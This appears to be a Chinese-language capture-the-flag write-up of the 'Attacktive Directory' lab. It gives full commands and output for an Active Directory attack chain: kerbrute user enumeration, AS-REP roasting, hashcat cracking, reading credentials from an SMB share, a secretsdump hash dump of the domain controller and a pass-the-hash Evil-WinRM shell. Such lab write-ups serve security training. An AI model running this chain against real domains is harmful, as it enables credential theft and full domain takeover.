Attacktive Directory
端口扫描
root@ip-10-10-162-222:~/attacktivedirectory# nmap -sTCV -p 53,80,88,135,139,389,445,464,593,636,3268,3389,5985,9389,47001,49664,49666,49669,49670,49671,49673,49677,49684,49692,49806 --min-rate 1000 10.10.21.64
Starting Nmap 7.60 ( https://nmap.org ) at 2023-09-11 02:49 BST
Nmap scan report for ip-10-10-21-64.eu-west-1.compute.internal (10.10.21.64)
Host is up (0.0057s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-11 01:49:23Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2023-09-10T01:28:15
|_Not valid after: 2024-03-11T01:28:15
|_ssl-date: 2023-09-11T01:50:17+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49692/tcp open msrpc Microsoft Windows RPC
49806/tcp open msrpc Microsoft Windows RPC
MAC Address: 02:4B:E3:B2:34:8D (Unknown)
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: ATTACKTIVEDIREC, NetBIOS user: <unknown>, NetBIOS MAC: 02:4b:e3:b2:34:8d (unknown)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-09-11 02:50:18
|_ start_date: 1600-12-31 23:58:45
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.46 seconds
139/445 - SMB
root@ip-10-10-162-222:~/attacktivedirectory# enum4linux 10.10.21.64
......
Looking up status of 10.10.21.64
ATTACKTIVEDIREC <00> - B <ACTIVE> Workstation Service
THM-AD <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
THM-AD <1c> - <GROUP> B <ACTIVE> Domain Controllers
THM-AD <1b> - B <ACTIVE> Domain Master Browser
ATTACKTIVEDIREC <20> - B <ACTIVE> File Server Service
.....
88 - kerberos
在题目中给出了两个字典, 我们使用工具进行扫描用户, 注意这里的域为 : spookysec.local
root@ip-10-10-162-222:~/attacktivedirectory# ./kerbrute userenum --dc spookysec.local -d spookysec.local userlist.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.1 (385cb2b) - 09/11/23 - Ronnie Flathers @ropnop
2023/09/11 03:54:39 > Using KDC(s):
2023/09/11 03:54:39 > spookysec.local:88
2023/09/11 03:54:39 > [+] VALID USERNAME: [email protected]
2023/09/11 03:54:40 > [+] VALID USERNAME: [email protected]
2023/09/11 03:54:40 > [+] VALID USERNAME: [email protected]
2023/09/11 03:54:40 > [+] VALID USERNAME: [email protected]
2023/09/11 03:54:40 > [+] VALID USERNAME: [email protected]
2023/09/11 03:54:40 > [+] VALID USERNAME: [email protected]
2023/09/11 03:54:40 > [+] VALID USERNAME: [email protected]
2023/09/11 03:54:40 > [+] VALID USERNAME: [email protected]
2023/09/11 03:54:41 > [+] VALID USERNAME: [email protected]
2023/09/11 03:54:41 > [+] VALID USERNAME: [email protected]
2023/09/11 03:54:43 > [+] VALID USERNAME: [email protected]
2023/09/11 03:54:46 > [+] VALID USERNAME: [email protected]
2023/09/11 03:54:47 > [+] VALID USERNAME: [email protected]
2023/09/11 03:54:50 > [+] VALID USERNAME: [email protected]
2023/09/11 03:54:50 > [+] VALID USERNAME: [email protected]
2023/09/11 03:54:52 > [+] VALID USERNAME: [email protected]
这里我们收集到了几个用户, 虽然我们有密码表但是还不是使用的时候, 这时候我们没有密码只有用户我们应该尝试 AS-REP Roasting 攻击
root@ip-10-10-162-222:~/attacktivedirectory# GetNPUsers.py spookysec.local/ -dc-ip 10.10.21.64 -usersfile user.txt
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[-] User james doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] invalid principal syntax
$krb5asrep$23$svc[email protected]:8af969802578b3b693d770cc6303e2f7$296514b1c1bbb3b07eef3b93fe91d26b199d07b46a6854bc7023fa2d9791dd7a6e7d8b55429f5c1e57269f85da9adb56056bd445fc0048714d93ae63e7f93c13218982455edf1f3f0ce9fb1efed3b4f94c255fced00c728a5eda4306b605c624708c0c26c011066c1566598f72f3de0a6c7944676b438a524a7900cd49a32b8685fee9d7b0a9719e97424bd287e93b72c2a5bf6b78f4b179f03594fd07b4c24f438839201278695184f301493fa1ae1230f032433005b52f781be58127dab39152fbb8cd7695afb4415c59f3397a9ec3c886ba3f5c362b3638aa9560b6df43564f18c2e29b77fbbf6b0e94b71d0d9a286098
[-] invalid principal syntax
收集到用户 svc-admin 的票证后, 进行解密
root@ip-10-10-162-222:~/attacktivedirectory# hashcat -a 0 -m 18200 svc-admin-hash.txt passwordlist.txt
$krb5asrep$23$svc[email protected]:8af969802578b3b693d770cc6303e2f7$296514b1c1bbb3b07eef3b93fe91d26b199d07b46a6854bc7023fa2d9791dd7a6e7d8b55429f5c1e57269f85da9adb56056bd445fc0048714d93ae63e7f93c13218982455edf1f3f0ce9fb1efed3b4f94c255fced00c728a5eda4306b605c624708c0c26c011066c1566598f72f3de0a6c7944676b438a524a7900cd49a32b8685fee9d7b0a9719e97424bd287e93b72c2a5bf6b78f4b179f03594fd07b4c24f438839201278695184f301493fa1ae1230f032433005b52f781be58127dab39152fbb8cd7695afb4415c59f3397a9ec3c886ba3f5c362b3638aa9560b6df43564f18c2e29b77fbbf6b0e94b71d0d9a286098:management2005
139/445 - SMB
使用得到的账号进行枚举 SMB 服务, 发现有一些共享可读
root@ip-10-10-162-222:~/attacktivedirectory# smbmap.py -H 10.10.21.64 -u svc-admin -d spookysec.local -p management2005
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - [email protected]
https://github.com/ShawnDEvans/smbmap
[+] IP: 10.10.21.64:445 Name: spookysec.local Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
backup READ ONLY
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
连接 backup 在其中获取到一个备份文件
root@ip-10-10-162-222:~/attacktivedirectory# smbclient -U [email protected]%management2005 //10.10.21.64/backup
WARNING: The "syslog" option is deprecated
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Apr 4 20:08:39 2020
.. D 0 Sat Apr 4 20:08:39 2020
backup_credentials.txt A 48 Sat Apr 4 20:08:53 2020
8247551 blocks of size 4096. 3652081 blocks available
smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (2.3 KiloBytes/sec) (average 2.3 KiloBytes/sec)
smb: \> SMBecho failed (NT_STATUS_CONNECTION_RESET). The connection is disconnected now
root@ip-10-10-162-222:~/attacktivedirectory# ls
backup_credentials.txt kerbrute passwordlist.txt svc-admin-hash.txt userlist.txt user.txt
root@ip-10-10-162-222:~/attacktivedirectory# wc backup_credentials.txt
0 1 48 backup_credentials.txt
root@ip-10-10-162-222:~/attacktivedirectory# cat backup_credentials.txt
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
经过解密我得到一个 backup 用户, 我们可以利用此来转储哈希 CyberChef
root@ip-10-10-162-222:~/attacktivedirectory# secretsdump.py spookysec.local/backup:[email protected]
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
后渗透
Administrator
使用转储得到的哈希值, 进行 PTH 攻击
root@ip-10-10-162-222:~/attacktivedirectory# evil-winrm -i 10.10.21.64 -u administrator -H 0e0363213e37b94221497260b0bcb4fc
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>